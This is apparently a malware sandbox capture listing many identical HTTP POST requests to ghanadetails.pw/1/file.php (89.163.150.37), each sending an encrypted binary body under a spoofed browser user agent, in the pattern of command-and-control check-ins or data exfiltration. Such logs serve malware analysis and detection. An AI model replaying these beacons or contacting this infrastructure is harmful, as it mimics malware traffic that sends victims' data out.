  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

]\xcd\xbc\x8aZ9#\7\x90l\xf7?M'G	\xadKF\xec\x94[\x1a4\xa7\xec\x82%|\xf7c\x0e|vw\xae\xb1\x0c8\xc1\xa2\xb5\x01\x91\xfe\x10\xf2&o\x8en\x14y7OVZQ@\x1c\x96\xcb\x01\xa2\xe9Y\xcb\xd7r8\x91\xbe\x15\x9c.\xbe\xb0\xee\x8d\xdcV\xb3rH.\xb2\x0c\x0f\x80RB\x07P\xdfD\x01bd\x01\x8c\xf2U\xca\x99\x81\xb7\xe3kQ\xf9\x94\xaa\x8aw\xabFD/\xfeSW\xe8\xdf\x91\xe7\xfc\x83\xd3\x8b\xcc\xfe\x99\xa9p\x96N\xb2}l\x93\x98

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

Z\xba]\xca0
=\xf75O\xf46uQ\xf9f\xf7aXi\xe8\x83\x08;\xa2\xf2\xa7\x80s9\x1c\xa8\xc2\xc0\\xfc\x0fI\xd9X\x08\xb6\xe6\x0b\x10)\x05\x18\x13hV\x8a\xdb\xa5\xaf\xa5\x0b\xc4\xd1\x89\x81\x18\xeb\x01\xa5\x9e\xb8\x8b\xbdA&:\xbc\xca\x04\xef\xf4\xac0\xac"\x9a\xa0]L9\xe1-\x99\xd5\x19@Q\x154\x8f\xcd\xdeN\x8a-
\x80\xaaP\x95\xe4\xe9\xea\x86\xec~\x9f\x8d\xafO\x89\x98\xb7\x14\x0e\xc9h\x16\x0ci\xdc\x83\xd4\xfc-\xbe\xf3\x9an=Lm\xe5\xad\xd9\x84

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\x18\x95m\xa6
RM\xd7\xaf\x04 \x9ac\xd0\xedN\xb1%\x0f\x0c}\xbfmM\x13\xf5%=,\xca
\xd5\xfd\x92\x11\xedHl\xd4\x05\xef\x80O\xda{\xd5lM(Q|\x923\xe4\xb7\xae\xc7\xbe.I\xa3\x96\x80\x01\xe7\xb1\x88\xe7\x87\x19V\x1a&\x81\xd0C\xe2-$\x84d\xde\xf78\xd9\x05\x84[(\xd2\x9b\xfd\x0e\xe6"\xf2\xf2\x8c\x03\x9bj/\x8d\xf7\xb7\xa3M8\x81z\x85+\xa4\xb4\x85Wa\xd9\xaf\x1f\xc2\xb3\x97\xd6.\xe7\xb7\x83\x96\xd3\x1d\xd2\xc9\xc2\x1e\x1d\xd6&1\x01\xcf\x05

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\x9cBs\x9dQ\x9aRs\x8dN\xe3\xabD?R\xfac\x87k\xb4M\x88\xdb-\xd6q\x00K\xb8/\x7f\xd0c_\x15\xcc	\xbe\xd1\xbb\xd7\xd0\x96\xf1rx\xddw\xad1\x8bTX!\x81\xc4\xc3\x8f\xf5\x8a\x82\xc6@\xb1\xd3\xd6&lla\xf9\x0e\xb4{\xa3\xc2ur+\x80\x06\xcc#0Y\x82\x82\x8b]\xe6\x0e;*\xb3\xe7G\xc3\xee\xa8\x15\x84R'\xe6 \;\xbc\x13 \x8f*\xc3\xa3TZ\xe3\\xab\xcd\xb2\x82\x07\x15\x0f\xb7w3\xa2\xb4\xa3F:\xa8\xa3^\x17\x85Q\x8bPS7\xd5q

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

F\x88v\xfbU\xf7,\xd2<\x9eY|\xa4\xce`\xa3\x96|\x99#\xc2$\xd2\xa9m\x1e\xf2Q,\xe9\xdcu\x1c0\xb5\x0f\xa8v
\xbf\xc3\xa5\x89\x837,J\x8b\xfdo\xdcfr(-\xe5\xddE\xa25\xb3\xa5F\xb1	\x1c#
h\x0c\x87\xaf\x05\xab\x19\x15\x95\x83\x19\xd9\xf37\xd1\xa7\xd6.\x8b\x0f\xe6\x89\xfc!\xbeuD\xe2\xbc\x81\x08\xd6%\x9a\xfc\xe24)$\xceVt\x18\xd6\x93\xfd\x03h\xc9U\x07\xec\xacHP\xaa>\xd4q3x~\xa6 >\xc5\xdd\xff\xa6U\xeb\\xb0\xa2\x05\x8c\x84

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xda\x81W5C\xf2\x89\x19\xe3\xe7\x06\xf00\xear\xb7
\x86\x04\x9b\x9f\xb4\x92A\x9e?\x84\xa2A+\xe4C\xb6\x0f\xa2\xf7\x88E\x99B*\xea\xe09\x95>n\xa9P\xa3w\xe8\x19\x8e[;\x18R\xe2\xf0\xe8QH\xb1\x95\x15\x02\xc4~	"d\xda\xd2F\x99\x01\xa7\x0b\xcdh\xcdL\x1f\x8b\xbe\xcb\xe7\x15\xa8\x8a\xd2\xd3\xb7|\xd4\x16\xbe\x1f.\x05\xa9o\x1f\xddfMt\xf4f<\xf4>1\xa8\xe6\xa2\xf3q2i_\x10oe \x7f3\xe4w\x87\xee(\xc0x4y,\xb4\xd0$\x86\x17\x98\x1f

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

L\xd9\x95\x08	|$\xe0\x03zV\xe96\xb8--q%\xb1\xf1\x8fXc/\x1c\x133~-\xbb?R-Zm\xc7\xcf\xc69\xb6\xc7z\xbd-SOl\xd4\x0c<\x1b\xdd\xc5\xbdV}Z\xac\xcc\x06\xae\xeb\xb9\x8a8v\xfb\xc2\x0f\xbc\xb4\xa6\x01t-\xbb<\xceol/U\xc2N\xa0i\x01\xb2\xac\xbf\x065\x84\x1c\x9c\xfe\xaa\xcc\xf79e
\xe8\xcc\x17\xd17G\xd8\x1eIDh\xb87\xa6\x9c1\xaer\xc1Y\x8d\x99#\x9a\x8e\x08I\x14p\xf6Jj\xb0\xae\xfc\xd5\xdb\xf7\x16

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xbb%\xe5
1\xf6\xdc;\xc5v\xda\xca\xbd\x03\x85xj\xc0k\xe8N
O\x02\xdci\xf0\xcbE\xf7\x995\xbd\xc1z\xa2\x90+\xa6
f\x11Vi\xbf\x93\xa3\xe6p\xbe\xa6\xa3c\x88\x1d7\xfd\xb1h\xd4\xa1\xc0x\x8a\xcf\x8a\x8b\xc076L}\xc7x\xa1\x98\xb7u\xc794\xb0\x18Wa;-\x9fl\xc5\xc5\x80\xecP:\x99:W\xe0\:\xe0wp\xb6\xba\xdc\x034\xc2\x86v\x14:\x8a\xd8:\x04\xe58fD)K,\xb1O\x08\xbe\xe8\x00\xf4r\xe0Hu:\xd9W\xd4\x9d

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xa5\x94\xee\x9bX\x0c\x18\xa9\x87H\x8eT\xfa\xb0\xdcd\x9c\x10\xe4\xdbk\xd8\x00It\x14\xe8=c\xb0Dj\xfc/.l\xa6\x8e=\xc7{p]\xa8\xa7\x7f\xa5\xa5\xd91v\xcf\x19\x05
#
\x93/}\xd8\xd8\xfa\x8a\xd1;\x80Q^\xcc\x88\xef\x85F\xf5\x06\xf0\xc6\x9e%\xc2`\x97dD\xe9b\xd4\xc4\xb8\xddv\xca\x17\xe7\xc6{\xb9\xb4\x92\x0cE\xec\xbd\xab\xdb\xd7\xc2,.\x805\xbd\xb5Z\xb4@\x89\xf5,\x91fn\xe2U\xa9\xcd\x08\xa0Y\x0be\x1b\x1a\x8c\xe7x\xe7\x03J\xda

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xfeC\xa5\x97-\xb0\x92\xc4\xc9E\xebY\xabW\xebxs\x1f\xff\x9f\xd7\x82\xceI\xc28\x0b\xb9\xcb\x89\xacQ\x93\xccQT\xe7\x06\x83\x9e\x01I\x0c\x91S4\xdf\x98\{\xa4R\x95\xb7+\xd10fO\xc7N\xdf,\x8f\x8f\xe9\xceX.u\x07\x87\xceN\x95\x0e\xa4$\xac<(j\x89%\xfd\xb6\xa9\xd1w\x91;\xf7g+
\xf8\x1eP\xc1\xa0G\xc7X\xee\xdb\xe8\x8c\xf1C\xf7\x89\x17l\x84\x7f\xce\xd5\xfa\x12\x05\x19t\xb3X\xd7\xbdKJ\xa7\xe1

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

7\xfb\xd12PC\x1epIA\x98a\x8dm#\xde\x15\x18\xecu\x9cKOS\xb8\xef\xab\xf1r\xc5\x9aJAo>\xea\x81\xee\x141\x9aVd\xb2n\x15\x0c%!g\xac\xa3\xc5e\xb1\xd0Q\xaa\xf4\x94\xec\x88\x01\x8fFQ\xba\xfdS\x86\x8b3NJ\xe66\x82\x1ed\x9aNm\x9a\xcf\xb6\x7f(\xcb
F\x9b\xbf\xdeg<\xe3\xcc\xf3\xae\x1e!/\xcfA@\xf7\xe4\xd2~\xd6Z\xaa\x11\x98w?\x85(\x88\x04x\xb8\x08\x0bu\xeafJnY

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xaf\xf2
.0\xc5q\xb0oH\xae=\xf6]\xcfi0\xb1\xac\xf7Y\xc8\xd7\xc5\xed\xbf\xde\xfa7\xeev\xa47\x88\x0c\x18\x0f\x86\x95\x1fR\xb1\xbc\x00\xfb\xcb\x0e|\xea \x02\xcf\xee\x08\xc7\xa8\xea\x14oqGM\x03\x8f\xdeXf\xe13\x00\xe4\xf3hC\xd0j\xf9.\x88-k\xc4\xdaMs\xfc\xb0]X\x16\xee\xb4\x9bL\xd0
\xba\x14\x9c\xec\xafGNo\x88\x10<`\xeb\x08X\xf3\xda\xdf\xd9S\xaeE\xfe|\xc3\x06\x93\xee\xde/dJ\xf6P

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xc4\xd58\xd4\xc7\xf4\x84F\xd4v\x0c\x03\xe3)#R\x027B<\xe4X\x01\x96\xdd\xa6\x16C*I\x90\xbfK\xb8.\xf5\xef\xa0w\xfe\xfe\x98	)\x91F\xc8;\xf1)[\xc8\xc0i\xb1\x1fc\x87w]\xcf\x7fp\x01;\xf1\xdd\x95J\xbf\x9f\x8b]\xf3\xfc\xdab\xd4\xea\x98\xd7\xcc\xba\x08@\xe2\xe8\x80\xe6\x81\xa8\x83\x08e\xb8\x98D\xa6<\x83\xcd\xe3.\x0c\xa6\xbb\x0b\xcbk\xe9!]}\xcc\xa2
\x92T\xa9\xaef\x8a\xce\xc2B\x0eG\x83J\x93H\xa0\x04d\xd7\x8c\xadT\x1d\x98O\xfc

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

WM\xad\x97iDR\xdfr\x03\xa9\x1cC\xb9\xf0\xbdTspX\xe6\xc0\xe2\xc79&\x88\xfd\x81i	\x9a\xfd\x05\x9e\x93d5\x84B}\xc8\x89\x13\x14\xf3>\xf1\x82HL\x89\xe7\xd4wk\xa2"\xcc\xc6Az\xcc\x01\xa8iH\xd6\xe4\x0fI\x12\xfb\x86Y\xc5\xc2D9w\x81\x88\x88lBz\x0b\xd1\x02\x016=\xa3E!\xbd\xf2\x1b\x8c\xe5Fv\xdd\xb0%\xeb\x8b\xf1\xee\\xd7\x97\x0e\xad\xb5L\xb5\xe9o\xda\xa7/uY\xcc\x0b\xfb\x83\xd9\x0b\xdd\xe3\xaa\xd4\x01\x15\x0b!\xb8\x87\xefl

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xb4\x00\xb2@\x0c\x046\xb8o\xc7\xdc\xf5\xf2\xc8\x97\x8f<t\xfaS)"\x00\x98U\xdc\x91\x9a\xd6\xf6\x11L\xc8\x9eW\x92\xd7\xa36\xf3\xb6\xda*,sT\x8f\x15<\x99\x10T\xfe\xe0C\xe2\x18\x0e\x03w\xc03\x02\x01K$W\x01\x81O-u\xe6B,,s5^E\xe9\x8f\x02g\x8d\x98\xe9\x8en\xfb/Z\xf4\xda9k\xc7\x80E\xe4\xf5\xe0o\x01\xee\xf9(\xce\x89\xfbfs\xb0|\xe9\x91\xac\xdd[S\x1d\x03\xba\xe8MB5\x83:F\xc24\xcf\x94er\x16\xe5\xcdn^\x1d

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xa5a\x1f\x1b\x88\xbd:h\xc0\xa4"Zql\x1b\xb1q\x9f\xed\xf4s\xe9\xb7\xbb\x90O\xf0\x89\\x8c\xaf\xfbqWRa\xfb\xb2\x92\x8b\xb1\x11|+l\x00\xbf\x17\x94\x02&?Mk\xc6y\xae\x9a.cMN\xbb\xb1\xea\xf5J\xea\xb5F\x91\x15\xf9\x91b3@!b\xcb\x14\xd4\xa5pg\xe3\xee\x1d\x1b\xd8\xfe\xf9\xce\x107l\xd1\xe6\xef\xb8v^d\xd6F\x9d\xd1f
X\xedJ\xfa\x90\xf91\xf6\x16\xecp\xdf\x97\xdc\xfc\xc0?\x8c3\x9b\x97\xcf\xc0\xe3\x8f\xcbEZo\x90ze\x00~\x9ec

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xee\xe6h}\xc3\xc4Y\xb6{\x8bR\x84\x04\x0c\xb9A\xfb\x1b\x02n\x9a\xf65\xa6F\xd9\xc1A\xde\xcc\xe3\xe0!\xcb>\x1c\xab\xd0\xeaN\x11%\x17\xee\x02{\x06\xfc\x05\x9d\xd2\xbe\xbfo_\x7fc\x17\x04\xb0\xd4\x15\xec\xb1\xa1r=\x8c\xfe?\xf2\xcbB\xbe\x12\xed5A\xc0;\x9ePJ\xea\x8e\xfcl\x00\xcdN\xcf1LP{w\x81z\x83\xc5&<\x1c\x13\xe6\xa9\xba\xa3c#T\xa1k\x0f
\xb0\x04\x12uv\x12\x1a\xf6/Yd\xdb3\xd0\x10\xb8\xa6\xa8\xf6\xa8\x9b\xe1@\xe0\xa4\x10`\xdcn\xe9

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\x83\xa4d}\x84?\xaa\xf2I1|0+&\xe2\x84\x8bMv\xda\xbb\Wa\xf02u\xab\xda\xcd+\xf4X\x9d&\x08\xf8?
\x1e7\x8b-N9EI-a\xdf\xb2\x1e\x8a\xd1)\xac\xc1\xe8\xa4N\xc4\x000\xb1\xcc01\x8c\xb9\xc4\x01\x8fp\x04<Y\x1ak\x9b\xfe\xee\x06>^\xafV\x0e\xc7{\xa5{\xdbHQ\xb3c\xf8,\x9b\xd1u\xd3\xfbC\xc0\x07\x80\x03X\x1d\x1bp\x0fMm\x101\xac\x03\xa5\xb0\xe5V\xd1Iq\x073\xbdR\xb4\xa6\xef
[\xdf\xd3\xfa\xce\x10?J\x87\xab\x99

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xd1Hu7\x83\xdc\x0bz}\xb4\xad5\xdb\x82\x95U\x84\xb3|T\x83\xae\xab\x1d\xeb\x8b\\xad\x97\xa8\xf1\xafM6p\x05\xb8\x9b\xeb\xd1DI\xbb\x0cC\x88)Q\x04W+\x854\xb6c\xb2P\xc9^(\xe9\x05\x8a\x8a\xa5\xe7\x1b\xfd\x85\x1c\x9b<\x7f\xba\xd6g\xd1\xf4\xd7\x14\xda\xc3\x0f\xeb\xac\x9f\xc9\x80['i\xe6>\x0fR\x03\xca\xa0\xea\xfb\x12P:\xab\x94\xe21f\xc8\xd9\x0c\xc1`\xd3\x07\xfem:\x9b\xbd\xcb<\x1f\xb7dt\xbd\x08\xd4\x85\x90\xc9\xc0\xca\x9f4\x82\x1b +\xfb

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xa0m\x86y\xdf\x9d\x812-\x8dn\xbc\x8dx\xf5\xf2\x92\xcb!U;\xdfeI\xbd&c\xe7\x9fF\xb3\x19\x8a\xa55\xfdRl\xd7/\xa2\xc6\xce3\xa3\xc4\xff@\xa4\x99\xc02:q\x1bP\xb0\xd2\xd7\xd4W]~\x8a\xd4\xc2\xe8\xb3\xd9]\x11t/\x83\x15\xee\x87\x0e\xb7\xb3\xcc\xbbR\xea\x14\xee\x07\xd4
\x8aV\xac6\xe1\x10\xb5
3\xaf\x03\xf8\xa7\x06UrmDY(\x95\xda\xd0\xc0\x1d\xecIc\xfd\xe3_+'\x96K\xda,I\x08\xa5\xa0c\x87\x9c\x8b\x15|\xd2"\xe3\xa2\xad

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xaao\x03\xc6\xbd\xab\xb0>N\xba\xa3+)\xd0\x8b\x18\x0bq\x92\xc6\xbd\x80\xf2gL$\xc0\x19?(\x10\xd0Iny\x8b\xf9\x93/\xea\x088\xcam\xce\xa5Hc\xf4\xea\xbahu\xe7E\xb7\x88\x19\xbd\xe3>\xfa\x14\x8a\xde\xc0m\x0c\xbbk xL\xb4\xd8y#\xa6\xc9YU\x01\xe1y\x92\xb1\x90\xfa\xfc\x88\xf5R\x96\x8f\xb3|\xce\xf8\xe3uSX\xfe\x90\xd8\x93@\x07E\xf4m\xf3\x90n\x96\x13,k\xbd\xb8\x13\xec\xfc|\xb3\x8b#\x08\xaf\xa2\xe68\xfe\xbd$p\xb1\x15.5

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xd3\xb1z)\xb6_t\xd0\xc5$\xe5\xdbe\x92\x06\xfb\xfb\x8d-\xa6]\x00\x08\xc0\xe9\xb1k\x02v\x89\x02E\xaa*\x9a\xfeh\xfdq\x9e\x19<\x16\x07\x89\xe5&\x0f\xc0\xfdb\x7f\x0b!\xf9L\x0f\xfb;h\xe7\xcb\x96\x8f\xa2\x1b\x11\xe6\xb5\x9a\xe1\x93\xc2/\x9b\x8cj\xe1A\xbf\xa0\xf8[\x1cw4oX\\x18[L\xda+\xa4\xec'\xb6

\xc8<\xaa\xee\xc3\x9d\x96g\x99&p\x80\xf0\x02\xb9\xe3Kl\xc0\x98&\xe9\xc7\xf7~\xa9\xf1J\x8a\x13

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\x01g\x17\x1c\xdf\xe9\xa2\x9c\x1e\xef\x86s\xec\xb1i<4@\x03\xa0x\xca\x99H\xba&pH\xa7 _`]\xd9\xd2\xee$n\x82\xf7\xe7\xd2P\x8a%\xe3l\xed*\x15i\\x0b\xceM\xe1yI\x05\x07\x13G\xee\x8fp\xcd|\xd3\xdc,7\xdf\x19\xe4\xf8$\xe3\xc2.xo5u\x1aR\xfe\xfe\xd0\x0f\x8f@\x06\x0b\x82\xf9\xc9\xd0EB\x1a\x84\xafY\x87=s\xd0\xea5 :b\x1a\xea\xb2\xc0K\x83t5P[\xf9\x98\x8a%\x89JX\xc5

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\x9c\x91&\x85\x0fB\x82\xcc\x0cW^'\xe5[\xb4
;c\xce9\xa9\xc7\xb1\xfd:X\x95a\x02\xa1\xd7\x933\xdc\x10\x84\x076QT\x06\x99{-\xdf\xfaB(\xd6\xc5W6)0\x96\xa7
